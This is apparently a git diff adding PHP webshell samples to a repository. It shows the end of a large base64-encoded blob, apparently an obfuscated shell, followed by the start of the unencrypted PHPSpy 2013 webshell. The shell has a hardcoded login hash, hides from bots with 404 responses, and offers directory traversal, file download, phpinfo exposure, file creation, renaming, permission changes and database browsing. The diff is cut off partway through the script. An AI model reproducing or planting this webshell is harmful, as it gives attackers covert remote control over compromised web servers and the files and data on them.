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')));
+
+?>
\ No newline at end of file
diff --git a/php/phpspy/2013未加密.php b/php/phpspy/2013未加密.php
new file mode 100644
index 0000000..ee3f85d
--- /dev/null
+++ b/php/phpspy/2013未加密.php
@@ -0,0 +1,1616 @@
+<?php
+//ini_set('display_errors',1);
+@error_reporting(7);
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+if( strpos( strtolower( $_SERVER['HTTP_USER_AGENT'] ), 'bot' ) !== false ) {
+	header('HTTP/1.0 404 Not Found');
+	exit;
+}
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+define('SELF', $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+
+if( IS_GPC ) { 
+	$_POST = s_array($_POST);
+}
+$P = $_POST;
+unset($_POST);
+/*===================== ³ÌÐòÅäÖà =====================*/
+
+//echo encode_pass('angel');exit;
+//angel = ec38fe2a8497e0a8d6d349b3533038cb
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤
+$pass  = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
+
+//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
+// cookie ǰ׺
+$cookiepre = '';
+// cookie ×÷ÓÃÓò
+$cookiedomain = '';
+// cookie ×÷Ó÷¾¶
+$cookiepath = '/';
+// cookie ÓÐЧÆÚ
+$cookielife = 86400;
+
+/*===================== ÅäÖýáÊø =====================*/
+
+$charsetdb = array(
+	'big5'			=> 'big5',
+	'cp-866'		=> 'cp866',
+	'euc-jp'		=> 'ujis',
+	'euc-kr'		=> 'euckr',
+	'gbk'			=> 'gbk',
+	'iso-8859-1'	=> 'latin1',
+	'koi8-r'		=> 'koi8r',
+	'koi8-u'		=> 'koi8u',
+	'utf-8'			=> 'utf8',
+	'windows-1252'	=> 'latin1',
+);
+
+$act = isset($P['act']) ? $P['act'] : '';
+$charset = isset($P['charset']) ? $P['charset'] : 'gbk';
+$doing = isset($P['doing']) ? $P['doing'] : '';
+
+for ($i=1;$i<=4;$i++) {
+	${'p'.$i} = isset($P['p'.$i]) ? $P['p'.$i] : '';
+}
+
+if (isset($charsetdb[$charset])) {
+	header("content-Type: text/html; charset=".$charset);
+}
+
+$timestamp = time();
+
+/* Éí·ÝÑéÖ¤ */
+if ($act == "logout") {
+	scookie('loginpass', '', -86400 * 365);
+	@header('Location: '.SELF);
+	exit;
+}
+if($pass) {
+	if ($act == 'login') {
+		if ($pass == encode_pass($P['password'])) {
+			scookie('loginpass',encode_pass($P['password']));
+			@header('Location: '.SELF);
+			exit;
+		}
+	}
+	if (isset($_COOKIE['loginpass'])) {
+		if ($_COOKIE['loginpass'] != $pass) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/* ÑéÖ¤½áÊø */
+
+$errmsg = '';
+$uchar = '&#9650;';
+$dchar = '&#9660;';
+!$act && $act = 'file';
+
+//µ±Ç°Ä¿Â¼/ÉèÖù¤×÷Ŀ¼/ÍøÕ¾¸ùĿ¼
+$home_cwd = getcwd();
+if (isset($P['cwd']) && $P['cwd']) {
+	chdir($P['cwd']);
+} else {
+	chdir(SA_ROOT);
+}
+$cwd = getcwd();
+$web_cwd = $_SERVER['DOCUMENT_ROOT'];
+foreach (array('web_cwd','cwd','home_cwd') as $k) {
+	if (IS_WIN) {
+		$$k = str_replace('\\', '/', $$k);
+	}
+	if (substr($$k, -1) != '/') {
+		$$k = $$k.'/';
+	}
+}
+
+// ²é¿´PHPINFO
+if ($act == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+		exit;
+	} else {
+		$errmsg = 'phpinfo() function has disabled';
+	}
+}
+
+if(!function_exists('scandir')) {
+	function scandir($cwd) {
+		$files = array();
+		$dh = opendir($cwd);
+		while ($file = readdir($dh)) {
+			$files[] = $file;
+		}
+		return $files ? $files : 0;
+	}
+}
+
+if ($act == 'down') {
+	if (is_file($p1) && is_readable($p1)) {
+		@ob_end_clean();
+		$fileinfo = pathinfo($p1);
+		if (function_exists('mime_content_type')) {
+			$type = @mime_content_type($p1);
+			header("Content-Type: ".$type);
+		} else {
+			header('Content-type: application/x-'.$fileinfo['extension']);
+		}
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.sprintf("%u", @filesize($p1)));
+		@readfile($p1);
+		exit;
+	} else {
+		$errmsg = 'Can\'t read file';
+		$act = 'file';
+	}
+}
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=<?php echo $charset;?>">
+<title><?php echo $act.' - '.$_SERVER['HTTP_HOST'];?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input, select{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.red{color:#f00;}
+.black{color:#000;}
+.green{color:#090;}
+.b{font-weight:bold;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#fff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:none;}
+a:hover{color: #f00;text-decoration:underline;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffa;padding:5px 15px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+.drives{padding:5px;}
+.drives span {margin:auto 7px;}
+</style>
+<script type="text/javascript">
+function checkall(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+        if (e.type == 'checkbox') {
+			if (e.name != 'chkall' && e.name != 'saveasfile')
+				e.checked = form.chkall.checked;
+		}
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	g(null,null,'createdir',newdirname);
+}
+function fileperm(pfile, val){
+	var newperm;
+	newperm = prompt('Current dir/file:'+pfile+'\nPlease input new permissions:', val);
+	if (!newperm) return;
+	g(null,null,'fileperm',pfile,newperm);
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Filename:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	g(null,null,'rename',newfilename,oldname);
+}
+function createfile(){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	g('editfile', null, null, filename);
+}
+function setdb(dbname) {
+	if(!dbname) return;
+	$('dbform').tablename.value='';
+	$('dbform').doing.value='';
+	if ($('dbform').sql_query)
+	{
+		$('dbform').sql_query.value='';
+	}
+	$('dbform').submit();
+}
+function setsort(k) {
+	$('dbform').order.value=k;
+	$('dbform').submit();
+}
+function settable(tablename,doing) {
+	if(!tablename) return;
+	if (doing) {
+		$('dbform').doing.value=doing;
+	} else {
+		$('dbform').doing.value='';
+	}
+	$('dbform').sql_query.value='';
+	$('dbform').tablename.value=tablename;
+	$('dbform').submit();
+}
+function s(act,cwd,p1,p2,p3,p4,charset) {
+	if(act != null) $('opform').act.value=act;
+	if(cwd != null) $('opform').cwd.value=cwd;
+	if(p1 != null) $('opform').p1.value=p1;
+	if(p2 != null) $('opform').p2.value=p2;
+	if(p3 != null) $('opform').p3.value=p3;
+	if(p4 != null) {$('opform').p4.value=p4;}else{$('opform').p4.value='';}
+	if(charset != null) $('opform').charset.value=charset;
+}
